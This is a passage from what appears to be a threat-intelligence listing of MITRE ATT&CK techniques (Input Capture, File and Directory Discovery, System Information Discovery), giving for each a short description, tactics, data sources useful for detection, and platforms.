Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre